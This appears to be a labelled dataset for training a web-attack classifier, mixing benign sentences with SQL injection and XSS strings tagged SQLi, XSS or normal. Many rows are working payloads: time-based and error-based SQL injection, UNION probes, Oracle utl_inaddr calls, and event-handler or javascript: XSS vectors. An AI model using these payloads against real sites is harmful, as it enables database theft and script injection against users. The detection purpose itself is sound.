"1"" ) or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and ( ""cdnc"" like ""cdnc",2,SQLi,12522
1%' ) or sleep ( 5 ) #,2,SQLi,21544
""" When ""CBS All Access"" appears in the search results, select it and then select ""Add Channel.",3,normal,26471
"<content draggable=""true"" ondragstart=""alert(1)"">test</content>",1,XSS,3066
<small onfocusout=alert(1) tabindex=1 id=x></small><input autofocus>,1,XSS,2637
"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6",2,SQLi,18036
"1 ) ) as queb where 2449 = 2449 union all select null,null#",2,SQLi,17329
"Select project team Work with specialist support which may include HR, equality advisers, personnel specialists, occupational psychologists, project sponsors.",3,normal,25617
<object onfocusout=alert(1) tabindex=1 id=x></object><input autofocus>,1,XSS,2543
"<frameset onScroll frameset onScroll=""javascript:javascript:alert(1)""></frameset onScroll>",1,XSS,1751
"AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i",2,SQLi,11807
"-9272%"" ) ) ) or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( ( ""%"" = """,2,SQLi,10299
select ( case when ( 7990 = 7627 ) then 7990 else 1/ ( select 0 ) end ) --,2,SQLi,15774
Where's the astrologer?,3,normal,23656
23 or 1=1; --,2,SQLi,22260
"call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,15065
He decided to join the yoga class next week.,3,normal,22908
"-9265"" ) or 7834 = 1685",2,SQLi,21321
"{""id"":null,""firstName"":""Sokimm"",""lastName"":""Lim"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27041
"<noscript onmouseout=""alert(1)"">test</noscript>",1,XSS,6225
"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))--",2,SQLi,11527
"<img src\x12=x onerror=""javascript:alert(1)"">",1,XSS,6539
<small id=x tabindex=1 ondeactivate=alert(1)></small><input id=y autofocus>,1,XSS,2222
<noframes onpointerout=alert(1)>XSS</noframes>,1,XSS,6310
"1"" ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ( ""xhqc"" = ""xhqc",2,SQLi,10447
Select a coffee shop to visit.,3,normal,24175
"<form id=""test"" /><button form=""test"" formaction=""javascript:javascript:alert(1)"">X",1,XSS,1907
"<A HREF=\""//google\"">XSS</A>",1,XSS,7824
select pg_sleep ( 5 ) and ( '%' = ',2,SQLi,20059
How to watch it: Tully is playing in select theaters.,3,normal,26081
1'+ ( select 'kicv' where 1976 = 1976 and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) ) +',2,SQLi,9952
1 and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ),2,SQLi,10059
Modify the privacy settings for your account.,3,normal,22955
"1%"" union all select null,null,null,null,null,null,null,null,null#",2,SQLi,16626
Select your declare.,3,normal,24960
"The speaker, instead of deciding the question, submitted it to the judgment of the House, and it was ultimately referred to a select committee, which reported against Bradlaughs claim.",3,normal,25375
"<style>:target {color: red;}</style><q id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></q>",1,XSS,1252
<map onpointerup=alert(1)>XSS</map>,1,XSS,9122
"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26",2,SQLi,14900
I'll select my tuxedo.,3,normal,24366
"1'+ ( select 'fpnz' where 1592 = 1592 and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) ) +'",2,SQLi,10894
"<script>throw onerror=eval,'=alert\x281\x29'</script>",1,XSS,4854
"1' ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( 'hbld' = 'hbld",2,SQLi,11987
"1"" ) ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) and ( ( ( ""ijag"" = ""ijag",2,SQLi,14961
"javascript://</title></textarea></style></script --><li '//"" '*/alert()/*', onclick=alert()//",1,XSS,1689
Go and select.,3,normal,24792
"1%"" ) or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #",2,SQLi,17153
You can then select games from the menu and start playing!,3,normal,25089
"<datalist onbeforepaste=""alert(1)"" contenteditable>test</datalist>",1,XSS,2736
In 1770 a select committee met to consider policing in the Metropolis only to see their report quietly shelved.,3,normal,26030
1 or sleep ( 5 ),2,SQLi,22137
"While some costs may be standard across the board, others will vary depending upon the agency that you select.",3,normal,25134
1' ) where 8575 = 8575 and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --,2,SQLi,10680
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe,1,XSS,1133
"-8894%"" ) ) or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( ""%"" = """,2,SQLi,10409
AS INJECTX WHERE 1=1 AND 1=1--,2,SQLi,20507
"<spacer ondblclick=""alert(1)"">test</spacer>",1,XSS,7201
"<object ondblclick=""alert(1)"">test</object>",1,XSS,7100
"1"" where 5927 = 5927",2,SQLi,21897
"1 ) as ahfj where 4776 = 4776 or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12342
or 'one'='oneâ,2,SQLi,22191
<BODY ONLOAD=alert('XSS')>,1,XSS,9410
select ( case when ( 8362 = 7572 ) then 8362 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,13597
Select a podcast episode to listen to.,3,normal,24146
"<summary onkeypress=""alert(1)"" contenteditable>test</summary>",1,XSS,3378
"<style>@keyframes slidein {}</style><multicol style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></multicol>",1,XSS,313
"<style>@keyframes x{}</style><form style=""animation-name:x"" onanimationend=""alert(1)""></form>",1,XSS,1651
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="""" alt='",1,XSS,2460
1' where 7036 = 7036,2,SQLi,21749
"{""id"":null,""firstName"":""Sam"",""lastName"":""Tan"",""address"":"" 7 Pasir Panjang #01-239"",""city"":""681"",""telephone"":""4006857720""}",3,normal,27216
<select autofocus onfocus=alert(1)>,1,XSS,9005
"1"" ) ) as ltco where 3862 = 3862 or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12348
"<basefont ondblclick=""alert(1)"">test</basefont>",1,XSS,6236
"1'|| ( select 'odud' from dual where 2468 = 2468 or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,11771
"<listing draggable=""true"" ondragend=""alert(1)"">test</listing>",1,XSS,3346
"select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and 'fbnx' = 'fbnx",2,SQLi,13340
"<shadow onbeforecopy=""alert(1)"" contenteditable>test</shadow>",1,XSS,3398
"1"" ) ) ) union all select null,null,null--",2,SQLi,19303
<object data=/ onreadystatechange=alert(1)>,1,XSS,7289
"<a xmlns:xlink="""" xlink:href=""?"">",1,XSS,3418
<body onpointermove=alert(1)>XSS</body>,1,XSS,8130
"1' ) ) as fusi where 2788 = 2788 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,14935
-7054 ) as gzvf where 9146 = 9146 or 3038 = 3038,2,SQLi,18683
The feature will launch in select countries later this year.,3,normal,25454
<mark id=x tabindex=1 onfocus=alert(1)></mark>,1,XSS,6300
Delete emails.,3,normal,23066
Randomly select a word.,3,normal,24448
"1"" ) ) ) union all select null,null,null,null,null,null,null,null#",2,SQLi,16585
"1'|| ( select 'xjtq' from dual where 5719 = 5719 or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) ) ||'",2,SQLi,11823
"<svg onbeforecopy=""alert(1)"" contenteditable>test</svg>",1,XSS,4449
"<footer onpaste=""alert(1)"" contenteditable>test</footer>",1,XSS,4341
"select * from users where id = 1 union select @ 1$,version ( ) -- 1",2,SQLi,16467
"1"" ) ) as fmul where 7827 = 7827",2,SQLi,20369
"<nobr onbeforepaste=""alert(1)"" contenteditable>test</nobr>",1,XSS,3846
"1"" ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ""ponv"" = ""ponv",2,SQLi,10735
"admin"" or ""1""=""1""/*",2,SQLi,21908
"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#",2,SQLi,17228
"{""id"":null,""firstName"":""Mark"",""lastName"":""Taylor"",""address"":""52777 Leaders Heights Rd"",""city"":""661"",""telephone"":""142940621""}",3,normal,27503
"<bgsound onkeyup=""alert(1)"" contenteditable>test</bgsound>",1,XSS,3940
"ABC<div style=""x:\xE2\x80\x87expression(javascript:alert(1)"">DEF",1,XSS,2858
"<;DIV STYLE="";width: expression(alert(';XSS';));"";>;",1,XSS,5096
1' waitfor delay '0:0:5'--,2,SQLi,20960
"<nobr oncontextmenu=""alert(1)"">test</nobr>",1,XSS,7351
1' rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and 'nbxw' = 'nbxw,2,SQLi,14736
"1' ) ) or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( 'gyre' = 'gyre",2,SQLi,11147
"1 ) union all select null,null,null,null,null,null,null,null,null#",2,SQLi,16624
<th onpointerenter=alert(1)>XSS</th>,1,XSS,8886
Insert the memory card.,3,normal,22634
"-5207"" where 2050 = 2050 union all select 2050,2050,2050,2050,2050,2050,2050--",2,SQLi,15316
"1 ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( 6690 = 6690",2,SQLi,12678
"1"" and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ""egzm"" = ""egzm",2,SQLi,12674
<xmp onblur=alert(1) tabindex=1 id=x></xmp><input autofocus>,1,XSS,3531
"1', ( select ( case when ( 2073 = 5314 ) then 1 else 1/ ( select 0 ) end ) )",2,SQLi,15530
"<aside onmouseleave=""alert(1)"">test</aside>",1,XSS,7116
"_http://[email protected] style=background-image:url();background-repeat:no-repeat;display:block;width:100%;height:100px; onclick=alert(unescape(/Oh%20No!/.source));return(false);//",1,XSS,5
"<tt oncut=""alert(1)"" contenteditable>test</tt>",1,XSS,6437
"Open Photoshop CC 2020 and select ""Open"" and then select the file you want to flip.",3,normal,25820
"1 ) as kjsd where 1670 = 1670 or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12515
"<SCRIPT ="">"" SRC=""""></SCRIPT>",1,XSS,4422
1'|| ( select 'nwve' where 7721 = 7721,2,SQLi,19738
"<colgroup draggable=""true"" ondrag=""alert(1)"">test</colgroup>",1,XSS,3533
"-5507' or elt ( 1032 = 1032,3623 ) and 'ndqw' = 'ndqw",2,SQLi,18118
-6412%' or 4065 = 5815 and '%' = ',2,SQLi,20162
Select your brand.,3,normal,24898
"-2216 ) ) as hxmq where 5677 = 5677 union all select 5677,5677--",2,SQLi,16780
"AND ELT(1337=1337,SLEEP(5)) AND '1337' LIKE '1337",2,SQLi,18539
"1%' and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and '%' = '",2,SQLi,14675
"<;A HREF="";//"";>;XSS<;/A>;",1,XSS,7612
"1"" ) ) ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( ( ""hkjm"" like ""hkjm",2,SQLi,10925
"1"" ) ) as xxdm where 4818 = 4818",2,SQLi,20261
"ABC<div style=""x:\x20expression(javascript:alert(1)"">DEF",1,XSS,4207
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--,2,SQLi,19439
"<figure draggable=""true"" ondragleave=""alert(1)"">test</figure>",1,XSS,3404
Select a fragrance for your space.,3,normal,24099
"1"" ) ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ( ""cyyh"" = ""cyyh",2,SQLi,10674
"<style>:target {color:red;}</style><head id=x style=""transition:color 1s"" ontransitionend=alert(1)></head>",1,XSS,1221
"-9820"" or 1038 = 7502#",2,SQLi,21470
"<XSS STYLE=""behavior: url(;"">",1,XSS,8549
"<button draggable=""true"" ondragenter=""alert(1)"">test</button>",1,XSS,3330
"<nav draggable=""true"" ondragleave=""alert(1)"">test</nav>",1,XSS,4587
1' in boolean mode ) or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) #,2,SQLi,15641
"<dfn draggable=""true"" ondragend=""alert(1)"">test</dfn>",1,XSS,4911
Where's the mall?,3,normal,23509
"First up, is the ban on immigration from select countries.",3,normal,26196
"<dl onkeydown=""alert(1)"" contenteditable>test</dl>",1,XSS,5527
"select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( ( ""soyg"" = ""soyg",2,SQLi,13554
"<bgsound ondblclick=""alert(1)"">test</bgsound>",1,XSS,6610
Select product.,3,normal,24557